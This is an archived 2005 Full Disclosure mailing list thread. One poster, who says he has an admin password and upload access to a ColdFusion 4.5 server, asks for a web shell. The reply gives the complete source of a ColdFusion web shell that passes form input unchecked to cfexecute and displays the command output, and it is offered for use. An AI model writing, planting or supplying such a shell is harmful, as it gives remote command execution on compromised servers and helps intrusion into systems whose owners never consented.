Full Disclosure mailing list archives

Re: coldfusion pentest

From: "Javier Reoyo" <javier.reoyo () interdominios com>
Date: Tue, 10 May 2005 10:31:54 +0200

Hi fatb,


this is from mailing of securiteam. Try it.

  ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
 < tr>
  < td>Command:</td>
  < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
 </tr>
 < tr>
  < td>Options:</td>
  < td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
 </tr>
 < tr>
  < td>Timeout:</td>
  < td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
 </tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:grutz () jingojango net> Kurt
Grutzmacher.



========================================

----- Original Message ----- 
From: "fatb" <fatb () security zz ha cn>
To: <pen-test () securityfocus com>
Cc: <full-disclosure () lists grok org uk>
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest

Hi all guys

I've successed get the admin's passwd of the web interface

and I can upload any kinds of files to the server

the server is running coldfusion 4.5 with iis 5.0

but I can not find a coldfusion webshell to continue

anybody could be kind enough to send me a  working coldfusion webshell

thx in advanced!



----------------------------------------------------------------------------
----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

coldfusion pentest fatb (May 09)
- Re: coldfusion pentest Kurt Grutzmacher (May 09)
- Re: coldfusion pentest Frederic Charpentier (May 10)
- Re: coldfusion pentest Javier Reoyo (May 10)
  - Re: coldfusion pentest fatb (May 10)
  - Re: coldfusion pentest fatb (May 10)